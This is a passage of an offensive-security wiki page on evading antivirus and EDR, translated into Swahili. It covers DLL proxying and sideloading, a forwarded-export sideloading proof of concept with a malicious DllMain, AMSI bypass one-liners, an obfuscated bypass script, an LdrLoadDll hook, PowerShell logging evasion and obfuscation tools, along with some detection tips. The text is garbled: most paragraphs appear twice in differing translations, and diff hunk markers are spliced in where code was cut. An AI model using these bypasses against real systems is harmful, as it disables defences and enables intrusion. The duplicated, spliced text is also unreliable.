**DLL Proxying** inapeleka simu ambazo programu inazofanya kutoka kwa proxy (na DLL hatari) kwenda DLL ya asili, hivyo kuhifadhi utendaji wa programu na kuwa na uwezo wa kushughulikia utekelezaji wa payload yako.
Nitakuwa nikitumia mradi wa [SharpDLLProxy](https://github.com/Flangvik/SharpDllProxy) kutoka kwa [@flangvik](https://twitter.com/Flangvik/)
Nitakuwa nikitumia mradi [SharpDLLProxy](https://github.com/Flangvik/SharpDllProxy) kutoka kwa [@flangvik](https://twitter.com/Flangvik/)
Haya ni hatua niliofuata:
Hizi ni hatua nilizofuata:
```
1. Find an application vulnerable to DLL Sideloading (siofra or using Process Hacker)
2. Generate some shellcode (I used Havoc C2)
3. (Optional) Encode your shellcode using Shikata Ga Nai (https://github.com/EgeBalci/sgn)
4. Use SharpDLLProxy to create the proxy dll (.\SharpDllProxy.exe --dll .\mimeTools.dll --payload .\demon.bin)
```
Amri ya mwisho itatupa mafaili 2: DLL source code template, na DLL ya asili iliyobadilishwa jina.
Amri ya mwisho itatupa mafaili 2: DLL source code template, na DLL asilia iliyopewa jina jipya.
<figure><img src="../images/sharpdllproxy.gif" alt=""><figcaption></figcaption></figure>
```
@ -106,38 +106,38 @@ Amri ya mwisho itatupa mafaili 2: DLL source code template, na DLL ya asili iliy
```
<figure><img src="../images/dll_sideloading_demo.gif" alt=""><figcaption></figcaption></figure>
Zote shellcode yetu (encoded with [SGN](https://github.com/EgeBalci/sgn)) na proxy DLL zina kiwango cha utambuzi cha 0/26 kwenye [antiscan.me](https://antiscan.me)! Ningesema hiyo ni mafanikio.
Both our shellcode (encoded with [SGN](https://github.com/EgeBalci/sgn)) and the proxy DLL have a 0/26 Detection rate in [antiscan.me](https://antiscan.me)! I would call that a success.
<figure><img src="../images/image (193).png" alt=""><figcaption></figcaption></figure>
> [!TIP]
> Ninapendekeza sana uangalie [S3cur3Th1sSh1t's twitch VOD](https://www.twitch.tv/videos/1644171543) kuhusu DLL Sideloading na pia [ippsec's video](https://www.youtube.com/watch?v=3eROsG_WNpE) ili ujifunze zaidi kuhusu tuliyojadili kwa undani.
> Ninapendekeza sana uangalie [S3cur3Th1sSh1t's twitch VOD](https://www.twitch.tv/videos/1644171543) kuhusu DLL Sideloading na pia [ippsec's video](https://www.youtube.com/watch?v=3eROsG_WNpE) ili ujifunze zaidi kuhusu yale tunayojadili kwa undani zaidi.
### Kutumia Vibaya Forwarded Exports (ForwardSideLoading)
### Kutumia Forwarded Exports (ForwardSideLoading)
Windows PE modules zinaweza ku-export functions ambazo kwa kweli ni "forwarders": badala ya kuashiria code, entry ya export ina string ya ASCII ya muundo `TargetDll.TargetFunc`. Wakati mtumiaji anapotatua export, Windows loader itafanya:
Windows PE modules can export functions that are actually "forwarders": instead of pointing to code, the export entry contains an ASCII string of the form `TargetDll.TargetFunc`. When a caller resolves the export, the Windows loader will:
- Itapakia `TargetDll` ikiwa haijapakiwa
- Itatafuta `TargetFunc` kutoka kwake
- Itatatua `TargetFunc` kutoka kwake
Mambo muhimu ya kuelewa:
- Ikiwa `TargetDll` ni KnownDLL, hutolewa kutoka kwa namespace lililolindwa la KnownDLLs (mfano, ntdll, kernelbase, ole32).
- Ikiwa `TargetDll` sio KnownDLL, utaratibu wa kawaida wa utafutaji wa DLL unatumika, ambao unajumuisha directory ya module inayofanya utatuzi wa forward.
Tabia muhimu za kuelewa:
- Ikiwa `TargetDll` ni KnownDLL, inatolewa kutoka kwa protected KnownDLLs namespace (mfano, ntdll, kernelbase, ole32).
- Ikiwa `TargetDll` si KnownDLL, utaratibu wa kawaida wa utafutaji wa DLL unatumiwa, ambao unajumuisha directory ya module inayofanya forward resolution.
Hii inaruhusu primitive isiyo ya moja kwa moja ya sideloading: tafuta DLL iliyosainiwa inayotoa function iliyoforward kwenda jina la module lisilo la KnownDLL, kisha weka pamoja DLL hiyo iliyosainiwa na DLL inayodhibitiwa na mshambuliaji iliyoitwa hasa kwa jina kama module lengwa iliyo forwarded. Wakati forwarded export itakapoitwa, loader itatatua forward na kupakia DLL yako kutoka directory ile ile, ikitekeleza DllMain yako.
Hii inaruhusu primitive isiyokuwa ya moja kwa moja ya sideloading: tafuta signed DLL ambayo inatoa function iliyopelekwa kwa jina la module lisilo la KnownDLL, kisha iweke DLL hiyo iliyosainiwa pamoja na attacker-controlled DLL iliyopewa jina hasa kama module ya target iliyopeleka. Wakati forwarded export inapotumika, loader itatatua forward na itapakia DLL yako kutoka directory ileile, ikitekeleza DllMain yako.
Mfano ulionekana kwenye Windows 11:
Example observed on Windows 11:
```
keyiso.dll KeyIsoSetAuditingInterface -> NCRYPTPROV.SetAuditingInterface
```
`NCRYPTPROV.dll` si KnownDLL, hivyo inatatuliwa kupitia mpangilio wa utafutaji wa kawaida.
`NCRYPTPROV.dll` si KnownDLL, hivyo hutatuliwa kwa mpangilio wa kawaida wa utafutaji.
PoC (copy-paste):
1) Nakili system DLL iliyosainiwa kwenye folda inayoweza kuandikwa
1) Nakili DLL ya mfumo iliyosainiwa hadi folda inayoweza kuandikwa
```
copy C:\Windows\System32\keyiso.dll C:\test\
```
2) Weka `NCRYPTPROV.dll` yenye madhara katika folda ile ile. DllMain ndogo kabisa inatosha kupata utekelezaji wa msimbo; huna haja ya kutekeleza forwarded function ili kusababisha DllMain.
2) Weka `NCRYPTPROV.dll` yenye madhara katika folda ile ile. DllMain ndogo tu inatosha kupata code execution; huna haja ya kutekeleza forwarded function ili kuchochea DllMain.
```c
// x64: x86_64-w64-mingw32-gcc -shared -o NCRYPTPROV.dll ncryptprov.c
#include <windows.h>
@ -153,31 +153,31 @@ return TRUE;
```
rundll32.exe C:\test\keyiso.dll, KeyIsoSetAuditingInterface
```
Tabia zilizoshuhudiwa:
Observed behavior:
- rundll32 (signed) inapakia side-by-side `keyiso.dll` (signed)
- Wakati wa kutatua `KeyIsoSetAuditingInterface`, loader inafuata forward hadi `NCRYPTPROV.SetAuditingInterface`
- Kisha loader inapakia `NCRYPTPROV.dll` kutoka `C:\test` na inaiendesha `DllMain` yake
- Ikiwa `SetAuditingInterface` haijatimizwa, utapata kosa la "missing API" tu baada ya `DllMain` tayari kuendesha
- Wakati inabainisha `KeyIsoSetAuditingInterface`, loader inafuata forward hadi `NCRYPTPROV.SetAuditingInterface`
- Kisha loader inapakia `NCRYPTPROV.dll` kutoka `C:\test` na inatekeleza `DllMain` yake
- Ikiwa `SetAuditingInterface` haitekelezwi, utapata kosa la "missing API" tu baada ya `DllMain` kuwa imekwisha kutekelezwa
Vidokezo vya ufuatiliaji:
- Zingatia forwarded exports ambapo module lengwa si KnownDLL. KnownDLLs zimeorodheshwa chini ya `HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs`.
Hunting tips:
- Lenga forwarded exports ambapo module lengwa sio KnownDLL. KnownDLLs zimetajwa ndani ya `HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs`.
- Unaweza kuorodhesha forwarded exports kwa zana kama:
```
dumpbin /exports C:\Windows\System32\keyiso.dll
# forwarders appear with a forwarder string e.g., NCRYPTPROV.SetAuditingInterface
```
- Tazama orodha ya forwarder ya Windows 11 kutafuta wagombea: https://hexacorn.com/d/apis_fwd.txt
- Angalia orodha ya forwarder ya Windows 11 kutafuta wagombea: https://hexacorn.com/d/apis_fwd.txt
Mapendekezo ya utambuzi/utetezi:
- Monitor LOLBins (e.g., `rundll32.exe`) loading signed DLLs from non-system paths, followed by loading non-KnownDLLs with the same base name from that directory
- Toa tahadhari juu ya mnyororo wa mchakato/moduli kama: `rundll32.exe` → non-system `keyiso.dll``NCRYPTPROV.dll` chini ya njia zinazoweza kuandikwa na mtumiaji
- Tekeleza sera za uadilifu wa msimbo (WDAC/AppLocker) na zuia write+execute katika saraka za programu
Detection/defense ideas:
- Fuatilia LOLBins (mfano, rundll32.exe) zinapakia DLL zilizosainiwa kutoka kwenye njia zisizo za mfumo, ikifuatiwa na kupakia non-KnownDLLs zenye jina la msingi sawa kutoka kwenye saraka hiyo
- Toa tahadhari kwa mnyororo wa mchakato/moduli kama: `rundll32.exe` → non-system `keyiso.dll``NCRYPTPROV.dll` ikiwa chini ya njia zinazoweza kuandikwa na mtumiaji
- Tekeleza sera za uadilifu wa msimbo (WDAC/AppLocker) na kata ruhusa za kuandika+kutekeleza katika saraka za programu
## [**Freeze**](https://github.com/optiv/Freeze)
`Freeze is a payload toolkit for bypassing EDRs using suspended processes, direct syscalls, and alternative execution methods`
Unaweza kutumia Freeze kupakia na kutekeleza shellcode yako kwa njia iliyofichwa.
Unaweza kutumia Freeze kupakia na kutekeleza shellcode yako kwa njia fiche.
```
Git clone the Freeze repo and build it (git clone https://github.com/optiv/Freeze.git && cd Freeze && go build Freeze.go)
1. Generate some shellcode, in this case I used Havoc C2.
@ -187,53 +187,53 @@ Git clone the Freeze repo and build it (git clone https://github.com/optiv/Freez
<figure><img src="../images/freeze_demo_hacktricks.gif" alt=""><figcaption></figcaption></figure>
> [!TIP]
> Kuepuka kugunduliwa ni mchezo wa paka na panya; kile kinachofanya kazi leo kinaweza kugunduliwa kesho, kwa hivyo usitegemee chombo kimoja tu — inapowezekana, jaribu kuunganisha mbinu mbalimbali za kuepuka.
> Evasion ni mchezo wa paka na panya; kile kinachofanya kazi leo kinaweza kugunduliwa kesho, hivyo usitegemee zana moja pekee; ikiwa inawezekana, jaribu kuunganisha mbinu mbalimbali za evasion.
## AMSI (Anti-Malware Scan Interface)
AMSI ilianzishwa kuzuia "[fileless malware](https://en.wikipedia.org/wiki/Fileless_malware)". Mwanzo, AV zilikuwa zinaweza tu kupima **files on disk**, hivyo ikiwa ungeweza kwa namna fulani kutekeleza payloads **directly in-memory**, AV haingekuwa na uwezo wa kufanya chochote kuzuia hilo kwa sababu haikuwa na mwonekano wa kutosha.
AMSI ilunduliwa kuzuia "[fileless malware](https://en.wikipedia.org/wiki/Fileless_malware)". Mwanzo, AV zilikuwa zinaweza tu kufanya scanning ya **files on disk**, hivyo ikiwa ungeweza kwa namna fulani kutekeleza payloads **directly in-memory**, AV haingeweza kuchukua hatua za kuzuia, kwa sababu haikuwa na mwonekano wa kutosha.
Kipengele cha AMSI kimeingizwa katika sehemu hizi za Windows.
- User Account Control, au UAC (kupandishwa cheo kwa EXE, COM, MSI, au ufungaji wa ActiveX)
- PowerShell (scripts, matumizi ya mwingiliano, na tathmini ya msimbo wakati wa utekelezaji)
- Windows Script Host (wscript.exe na cscript.exe)
- JavaScript na VBScript
- User Account Control, or UAC (elevation of EXE, COM, MSI, or ActiveX installation)
- PowerShell (scripts, interactive use, and dynamic code evaluation)
- Windows Script Host (wscript.exe and cscript.exe)
- JavaScript and VBScript
- Office VBA macros
Inaruhusu suluhisho za antivirus kuchunguza tabia za script kwa kuonyesha yaliyomo kwenye script katika muundo usiosimbwa na usiofichwa.
Hii inaiwezesha antivirus kuchunguza tabia za script kwa kuonyesha yaliyomo ya script kwa namna isiyoencrypted na isiyefichwa.
Kukimbia `IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')` kutaonyesha onyo lifuatalo kwenye Windows Defender.
Running `IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')` itatoa onyo lifuatalo kwenye Windows Defender.
<figure><img src="../images/image (1135).png" alt=""><figcaption></figcaption></figure>
Angalia jinsi inavyoandika awali `amsi:` kisha njia ya executable kutoka ambapo script ilikimbizwa; katika kesi hii, powershell.exe
Tambua jinsi inavyoweka `amsi:` mwanzoni kisha njia ya executable kutoka ambako script ilikimbia, katika kesi hii, powershell.exe
Hatukuweka faili lolote kwenye disk, lakini bado tuligunduliwa in-memory kwa sababu ya AMSI.
Hatukuweka faili yoyote kwenye disk, lakini bado tulikamatwa in-memory kwa sababu ya AMSI.
Zaidi ya hayo, kuanzia na **.NET 4.8**, msimbo wa C# unapitishwa kupitia AMSI pia. Hii hata inaathiri `Assembly.Load(byte[])` kwa ajili ya load in-memory execution. Ndiyo sababu inashauriwa kutumia matoleo ya chini ya .NET (kama 4.7.2 au chini) kwa in-memory execution ikiwa unataka kuepuka AMSI.
Zaidi ya hayo, kuanzia **.NET 4.8**, C# code inakimbizwa kupitia AMSI pia. Hii inaathiri hata `Assembly.Load(byte[])` kwa ajili ya utendaji in-memory. Ndiyo sababu inashauriwa kutumia toleo za chini za .NET (kama 4.7.2 au chini) kwa utendaji in-memory ikiwa unataka kuepuka AMSI.
Kuna njia chache za kuepuka AMSI:
Kuna njia chache za kupitisha AMSI:
- **Obfuscation**
Kwa kuwa AMSI hasa hufanya kazi kwa kugundua kwa njia za static, hivyo kubadilisha scripts unazojaribu kuziyasha inaweza kuwa njia nzuri ya kuepuka utambuzi.
Kwa kuwa AMSI hasa inafanya kazi na static detections, hivyo kurekebisha scripts unazojaribu kuingia inaweza kuwa njia nzuri ya kuepuka detection.
Hata hivyo, AMSI ina uwezo wa kuondoa obfuscation hata kama kuna tabaka kadhaa, kwa hivyo obfuscation inaweza isiwe chaguo zuri kulingana na jinsi inavyofanywa. Hii inafanya isiwe rahisi kuepuka. Ingawa, wakati mwingine, yote unayohitaji ni kubadilisha majina ya vigezo vichache na utakuwa sawa, hivyo inategemea ni kiasi gani kitu kimepigwa alama.
Hata hivyo, AMSI ina uwezo wa kuunobfuscate scripts hata kama zimewekwa tabaka nyingi, hivyo obfuscation inaweza kuwa chaguo mbaya kulingana na jinsi inavyofanywa. Hii inafanya iwe si rahisi kuepuka. Ingawa, wakati mwingine, yote unayohitaji ni kubadilisha majina ya baadhi ya variables na utafanikiwa, hivyo inategemea ni kwa kiasi gani kitu kimepokelewa kama tishio.
- **AMSI Bypass**
Kwa kuwa AMSI inatekelezwa kwa kuingiza DLL ndani ya mchakato wa powershell (pia cscript.exe, wscript.exe, n.k.), inawezekana kuiharibu kwa urahisi hata ukiendesha kama mtumiaji asiye na ruhusa za juu. Kutokana na kasoro hii katika utekelezaji wa AMSI, watafiti wamegundua njia nyingi za kuepuka skanning ya AMSI.
Kwa kuwa AMSI inatekelezwa kwa kupeleka DLL ndani ya process ya powershell (pia cscript.exe, wscript.exe, n.k.), inawezekana kuibadilika kwa urahisi hata ukiwa mtumiaji bila vipaumbele. Kutokana na hitilafu hii katika utekelezaji wa AMSI, watafiti wamegundua njia mbalimbali za kuepuka AMSI scanning.
**Forcing an Error**
Kulazimisha uanzishaji wa AMSI kushindwa (amsiInitFailed) kutasababisha hakutakuwa na skani itakayoznizwa kwa mchakato wa sasa. Hii awali ilifichuliwa na [Matt Graeber](https://twitter.com/mattifestation) na Microsoft imeunda signature ili kuzuia matumizi ya upana.
Kulazimisha AMSI initialization kushindwa (amsiInitFailed) kutasababisha hakuna scan itakayozinduliwa kwa process ya sasa. Awali hili lilifunuliwa na [Matt Graeber](https://twitter.com/mattifestation) na Microsoft imeunda signature ili kuzuia matumizi mapana.
```bash
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```
Kilichohitajika ni mstari mmoja tu wa msimbo wa powershell kufanya AMSI isitumike kwa mchakato wa powershell wa sasa. Mstari huu bila shaka umetambuliwa na AMSI yenyewe, hivyo mabadiliko yanahitajika ili kutumia mbinu hii.
Ilichukua mstari mmoja tu wa msimbo wa powershell ili kufanya AMSI isitumike kwa mchakato wa powershell wa sasa. Mstari huu kwa kawaida umebainishwa na AMSI yenyewe, hivyo mabadiliko yanahitajika ili kutumia mbinu hii.
Hapa kuna AMSI bypass iliyorekebishwa niliyopata kutoka kwenye [Github Gist](https://gist.github.com/r00t-3xp10it/a0c6a368769eec3d3255d4814802b5db).
Hapa kuna AMSI bypass iliyorekebishwa niliyoichukua kutoka kwenye [Github Gist](https://gist.github.com/r00t-3xp10it/a0c6a368769eec3d3255d4814802b5db).
```bash
Try{#Ams1 bypass technic nº 2
$Xdatabase = 'Utils';$Homedrive = 'si'
@ -247,7 +247,7 @@ $Spotfix = $SDcleanup.GetField($Rawdata,"$ComponentDeviceId,Static")
$Spotfix.SetValue($null,$true)
}Catch{Throw $_}
```
Kumbuka, hii huenda itachomwa alama mara tu chapisho hili linapotoka, kwa hivyo haupaswi kuchapisha code yoyote ikiwa mpango wako ni kubaki bila kugunduliwa.
Kumbuka, hii pengine itaonekana mara chapisho hili litakapotoka, kwa hivyo usichapishe code ikiwa mpango wako ni kubaki bila kugunduliwa.
**Memory Patching**
@ -256,69 +256,104 @@ This technique was initially discovered by [@RastaMouse](https://twitter.com/_Ra
> [!TIP]
> Tafadhali soma [https://rastamouse.me/memory-patching-amsi-bypass/](https://rastamouse.me/memory-patching-amsi-bypass/) kwa maelezo ya kina.
Kuna pia mbinu nyingi nyingine zinazotumika bypass AMSI kwa powershell; angalia [**this page**](basic-powershell-for-pentesters/index.html#amsi-bypass) na [**this repo**](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell) ili kujifunza zaidi kuhusu hizo.
There are also many other techniques used to bypass AMSI with powershell, check out [**this page**](basic-powershell-for-pentesters/index.html#amsi-bypass) and [**this repo**](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell) to learn more about them.
Chombo hiki [**https://github.com/Flangvik/AMSI.fail**](https://github.com/Flangvik/AMSI.fail) pia hutoa script za bypass AMSI.
### Blocking AMSI by preventing amsi.dll load (LdrLoadDll hook)
AMSI inanzishwa tu baada ya `amsi.dll` kupakiwa katika mchakato uliopo. Njia thabiti, isiyotegemea lugha, ya kuepuka ni kuweka usermode hook kwenye `ntdll!LdrLoadDll` ambayo inarejesha kosa wakati module iliyohitajika ni `amsi.dll`. Kwa matokeo, AMSI haitapakiwa na hakuna skani zitakazofanyika kwa mchakato huo.
Muhtasari wa utekelezaji (x64 C/C++ pseudocode):
```c
#include <windows.h>
#include <winternl.h>
typedef NTSTATUS (NTAPI *pLdrLoadDll)(PWSTR, ULONG, PUNICODE_STRING, PHANDLE);
static pLdrLoadDll realLdrLoadDll;
NTSTATUS NTAPI Hook_LdrLoadDll(PWSTR path, ULONG flags, PUNICODE_STRING module, PHANDLE handle){
if (module && module->Buffer){
UNICODE_STRING amsi; RtlInitUnicodeString(&amsi, L"amsi.dll");
if (RtlEqualUnicodeString(module, &amsi, TRUE)){
// Pretend the DLL cannot be found → AMSI never initialises in this process
return STATUS_DLL_NOT_FOUND; // 0xC0000135
}
}
return realLdrLoadDll(path, flags, module, handle);
}
void InstallHook(){
HMODULE ntdll = GetModuleHandleW(L"ntdll.dll");
realLdrLoadDll = (pLdrLoadDll)GetProcAddress(ntdll, "LdrLoadDll");
// Apply inline trampoline or IAT patching to redirect to Hook_LdrLoadDll
// e.g., Microsoft Detours / MinHook / custom 14byte jmp thunk
}
```
Vidokezo
- Inafanya kazi kwa PowerShell, WScript/CScript na custom loaders vilevile (chochote kingetumia AMSI).
- Tumia pamoja na kupeleka script kupitia stdin (`PowerShell.exe -NoProfile -NonInteractive -Command -`) ili kuepuka artefakti ndefu za mstari wa amri.
- Imeonekana ikitumiwa na loaders zinazotekelezwa kupitia LOLBins (mfano, `regsvr32` inayoitisha `DllRegisterServer`).
Zana hii [https://github.com/Flangvik/AMSI.fail](https://github.com/Flangvik/AMSI.fail) pia inatengeneza script za bypass AMSI.
**Ondoa saini iliyogunduliwa**
Unaweza kutumia chombo kama **[https://github.com/cobbr/PSAmsi](https://github.com/cobbr/PSAmsi)** na **[https://github.com/RythmStick/AMSITrigger](https://github.com/RythmStick/AMSITrigger)** kuondoa saini ya AMSI iliyogunduliwa kutoka kwa kumbukumbu ya mchakato wa sasa. Chombo hiki kinafanya kazi kwa kuchambua kumbukumbu ya mchakato wa sasa kwa ajili ya saini ya AMSI kisha kuandika juu yake kwa NOP instructions, vipi kuiondoa kabisa kutoka kwa kumbukumbu.
Unaweza kutumia zana kama **[https://github.com/cobbr/PSAmsi](https://github.com/cobbr/PSAmsi)** na **[https://github.com/RythmStick/AMSITrigger](https://github.com/RythmStick/AMSITrigger)** kuondoa saini ya AMSI iliyogunduliwa kutoka kwenye kumbukumbu ya process ya sasa. Zana hii inafanya kazi kwa kuchambua kumbukumbu ya process ya sasa kutafuta saini ya AMSI na kisha kuibadilisha kwa maagizo ya NOP, kwa ufanisi kuiondoa kwenye kumbukumbu.
**Bidhaa za AV/EDR zinazotumia AMSI**
Unaweza kupata orodha ya bidhaa za AV/EDR zinazotumia AMSI katika **[https://github.com/subat0mik/whoamsi](https://github.com/subat0mik/whoamsi)**.
**Tumia Powershell version 2**
Ikiwa utatumia PowerShell version 2, AMSI haitapakiwa, kwa hivyo unaweza kuendesha script zako bila kuchunguzwa na AMSI. Unaweza kufanya hivi:
**Tumia PowerShell toleo la 2**
Iwapo utatumia PowerShell toleo la 2, AMSI haitapakiwa, hivyo unaweza kuendesha script zako bila kutazamwa na AMSI. Unaweza kufanya hivi:
```bash
powershell.exe -version 2
```
## PS Logging
PowerShell logging ni kipengele kinachokuwezesha kurekodi amri zote za PowerShell zinazotekelezwa kwenye mfumo. Hii inaweza kuwa muhimu kwa madhumuni ya ukaguzi na utatuzi wa matatizo, lakini pia inaweza kuwa **tatizo kwa wadukuzi wanaotaka kuepuka kugunduliwa**.
PowerShell logging ni kipengele kinachokuruhusu kurekodi amri zote za PowerShell zinazotekelezwa kwenye mfumo. Hili linaweza kuwa muhimu kwa ukaguzi na utatuzi wa matatizo, lakini pia linaweza kuwa **tatizo kwa wanavunja sheria wanaotaka kuepuka kugunduliwa**.
To bypass PowerShell logging, you can use the following techniques:
To bypass PowerShell logging, unaweza kutumia mbinu zifuatazo:
- **Disable PowerShell Transcription and Module Logging**: Unaweza kutumia zana kama [https://github.com/leechristensen/Random/blob/master/CSharp/DisablePSLogging.cs](https://github.com/leechristensen/Random/blob/master/CSharp/DisablePSLogging.cs) kwa madhumuni haya.
- **Disable PowerShell Transcription and Module Logging**: Unaweza kutumia zana kama [https://github.com/leechristensen/Random/blob/master/CSharp/DisablePSLogging.cs](https://github.com/leechristensen/Random/blob/master/CSharp/DisablePSLogging.cs) kwa kusudi hili.
- **Use Powershell version 2**: Ikiwa utatumia PowerShell version 2, AMSI haitapakiwa, hivyo unaweza kuendesha scripts zako bila kukaguliwa na AMSI. Unaweza kufanya hivi: `powershell.exe -version 2`
- **Use an Unmanaged Powershell Session**: Tumia [https://github.com/leechristensen/UnmanagedPowerShell](https://github.com/leechristensen/UnmanagedPowerShell) kuanzisha powershell bila ulinzi (hii ndicho `powerpick` kutoka Cobal Strike hutumia).
- **Use an Unmanaged Powershell Session**: Tumia [https://github.com/leechristensen/UnmanagedPowerShell](https://github.com/leechristensen/UnmanagedPowerShell) kuanzisha powershell bila defenses (hii ndicho `powerpick` kutoka Cobal Strike hutumia).
## Obfuscation
> [!TIP]
> Mbinu kadhaa za obfuscation zinategemea encryption ya data, ambayo itaongeza entropy ya binary na kufanya kuwa rahisi kwa AVs na EDRs kuigundua. Kuwa mwangalifu na hili na labda tumia encryption tu kwenye sehemu maalum za msimbo wako ambazo ni nyeti au zinahitaji kufichwa.
> Mbinu kadhaa za obfuscation zinategemea kusimba data, ambayo itapandisha entropy ya binary na kufanya iwe rahisi kwa AVs na EDRs kuibaini. Kuwa mwangalifu na hili na pengine tumia encryption tu kwa sehemu maalum za code yako ambazo ni nyeti au zinahitaji kufichwa.
### Deobfuscating ConfuserEx-Protected .NET Binaries
Wakati unapoichambua malware inayotumia ConfuserEx 2 (au commercial forks), ni kawaida kukutana na tabaka kadhaa za ulinzi zitakazozuia decompilers na sandboxes. Mtiririko wa kazi uliopo hapa chini unaweza kwa uhakika **kurejesha IL inayokaribiana na asili** ambayo baadaye inaweza ku-decompile kuwa C# katika zana kama dnSpy au ILSpy.
When analysing malware inayotumia ConfuserEx 2 (au forks za kibiashara) mara nyingi unakutana na tabaka kadhaa za ulinzi zitakazozuia decompilers na sandboxes. Workflow ifuatayo inarejesha kwa kuaminika **IL inayokaribia asili** ambayo baadaye inaweza kuondolewa hadi C# kwa zana kama dnSpy au ILSpy.
1. Anti-tampering removal ConfuserEx encrypts every *method body* and decrypts it inside the *module* static constructor (`<Module>.cctor`). Hii pia inabadilisha PE checksum hivyo mabadiliko yoyote yatayafanya binary ifanyike crash. Tumia **AntiTamperKiller** kutafuta encrypted metadata tables, kupona XOR keys na kuandika upya assembly safi:
1. Anti-tampering removal ConfuserEx inasimba kila *method body* na kuisimbua ndani ya *module* static constructor (`<Module>.cctor`). Hii pia hubadili PE checksum hivyo mabadiliko yoyote yatakulazimisha binary kuanguka. Tumia **AntiTamperKiller** ili kupata jedwali za metadata zilizosasishwa, urejeshe XOR keys na kuandika upya assembly safi:
```bash
# https://github.com/wwh1004/AntiTamperKiller
python AntiTamperKiller.py Confused.exe Confused.clean.exe
```
Output inajumuisha vigezo 6 vya anti-tamper (`key0-key3`, `nameHash`, `internKey`) ambavyo vinaweza kuwa muhimu wakati wa kujenga unpacker yako mwenyewe.
Output ina parameta 6 za anti-tamper (`key0-key3`, `nameHash`, `internKey`) ambazo zinaweza kuwa muhimu wakati wa kujenga unpacker yako mwenyewe.
2. Symbol / control-flow recovery ingiza faili *clean* kwa **de4dot-cex** (a ConfuserEx-aware fork of de4dot).
2. Symbol / control-flow recovery lowesha faili *safi* kwa **de4dot-cex** (fork ya de4dot inayojua ConfuserEx).
```bash
de4dot-cex -p crx Confused.clean.exe -o Confused.de4dot.exe
```
Flags:
`-p crx` chagua profile ya ConfuserEx 2
• de4dot itafuta control-flow flattening, kurejesha namespaces, classes na majina ya variables za awali na ku-decrypt constant strings.
`-p crx` chagua profile ya ConfuserEx 2
• de4dot itafuta control-flow flattening, kurejesha namespaces, classes na majina ya variables ya asili na kusimbua strings zilizo konstanti.
3. Proxy-call stripping ConfuserEx replaces direct method calls with lightweight wrappers (a.k.a *proxy calls*) to further break decompilation. Zitoa kwa kutumia **ProxyCall-Remover**:
3. Proxy-call stripping ConfuserEx inabadilisha mwito wa moja kwa moja wa method kuwa wrappers nyepesi (a.k.a *proxy calls*) ili kuvitengenezea zaidi decompilation. Ziondoe kwa **ProxyCall-Remover**:
```bash
ProxyCall-Remover.exe Confused.de4dot.exe Confused.fixed.exe
```
After this step you should observe normal .NET API such as `Convert.FromBase64String` or `AES.Create()` instead of opaque wrapper functions (`Class8.smethod_10`, …).
Baada ya hatua hii utapaswa kuona API za kawaida za .NET kama `Convert.FromBase64String` au `AES.Create()` badala ya functions za wrapper zisizoeleweka (`Class8.smethod_10`, …).
4. Manual clean-up endesha binary iliyotokana chini ya dnSpy, tafuta Base64 blobs kubwa au `RijndaelManaged`/`TripleDESCryptoServiceProvider` matumizi ili kutambua payload ya *kweli*. Mara nyingi malware huihifadhi kama TLV-encoded byte array iliyowekwa ndani ya `<Module>.byte_0`.
4. Manual clean-up endesha binary iliyopatikana chini ya dnSpy, tafuta blobs kubwa za Base64 au matumizi ya `RijndaelManaged`/`TripleDESCryptoServiceProvider` ili kutambua payload ya *kweli*. Mara nyingi malware huhifadhi kama array ya byte iliyoencoded kwa TLV iliyowekwa ndani ya `<Module>.byte_0`.
The above chain restores execution flow **without** needing to run the malicious sample useful when working on an offline workstation.
Mnyororo hapo juu unarejesha mtiririko wa utekelezaji **bila** hitaji la kuendesha sample yenye madhara muhimu wakati unafanya kazi kwenye workstation isiyo na mtandao.
> 🛈 ConfuserEx huunda attribute maalum iitwayo `ConfusedByAttribute` ambayo inaweza kutumiwa kama IOC kuotomatisha kuainisha sampuli.
> 🛈 ConfuserEx hutengeneza attribute maalum inayoitwa `ConfusedByAttribute` ambayo inaweza kutumika kama IOC kwa kuandaa sampuli moja kwa moja.
#### One-liner
```bash
@ -327,37 +362,37 @@ autotok.sh Confused.exe # wrapper that performs the 3 steps above sequentially
---
- [**InvisibilityCloak**](https://github.com/h4wkst3r/InvisibilityCloak)**: C# obfuscator**
- [**Obfuscator-LLVM**](https://github.com/obfuscator-llvm/obfuscator): Lengo la mradi huu ni kutoa fork ya chanzo wazi ya suite ya uundaji wa [LLVM] inayoweza kuongeza usalama wa programu kupitia [code obfuscation] na tamper-proofing.
- [**ADVobfuscator**](https://github.com/andrivet/ADVobfuscator): ADVobfuscator inaonyesha jinsi ya kutumia lugha ya `C++11/14` kuzalisha, wakati wa compile, obfuscated code bila kutumia zana za nje na bila kubadilisha compiler.
- [**obfy**](https://github.com/fritzone/obfy): Inaongeza safu ya obfuscated operations zinazotengenezwa na C++ template metaprogramming framework ambazo zitamfanya mtu anayetaka crack application kuwa na kazi ngumu kidogo.
- [**Alcatraz**](https://github.com/weak1337/Alcatraz)**:** Alcatraz ni x64 binary obfuscator inayoweza ku-obfuscate aina mbalimbali za PE files ikiwa ni pamoja na: .exe, .dll, .sys
- [**metame**](https://github.com/a0rtega/metame): Metame ni engine rahisi ya metamorphic code kwa executables yoyote.
- [**ropfuscator**](https://github.com/ropfuscator/ropfuscator): ROPfuscator ni fine-grained code obfuscation framework kwa lugha zinazotambulika na LLVM zinazotumia ROP (return-oriented programming). ROPfuscator inaobfuscate programu kwenye assembly code level kwa kubadilisha maagizo ya kawaida kuwa ROP chains, ikizuia mtazamo wetu wa kawaida wa control flow.
- [**Obfuscator-LLVM**](https://github.com/obfuscator-llvm/obfuscator): Lengo la mradi huu ni kutoa fork ya open-source ya suite ya [LLVM](http://www.llvm.org/) ya compilation inayoweza kuongeza usalama wa programu kupitia [code obfuscation](<http://en.wikipedia.org/wiki/Obfuscation_(software)>) na tamper-proofing.
